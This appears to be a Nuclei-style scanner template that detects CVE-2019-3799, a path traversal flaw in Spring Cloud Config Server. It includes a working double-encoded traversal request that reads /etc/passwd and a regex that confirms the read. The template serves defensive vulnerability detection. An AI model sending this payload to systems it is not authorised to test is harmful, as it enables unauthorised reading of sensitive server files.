id: CVE-2019-3799 info: name: Spring Cloud Config Server - Local File Inclusion author: madrobot severity: medium description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack. reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 - https://www.oracle.com/security-alerts/cpuapr2022.html - https://nvd.nist.gov/vuln/detail/CVE-2019-3799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 epss-score: 0.01248 tags: cve,cve2019,lfi metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - 'root:.*:0:0:' part: body # Enhanced by mp on 2022/07/22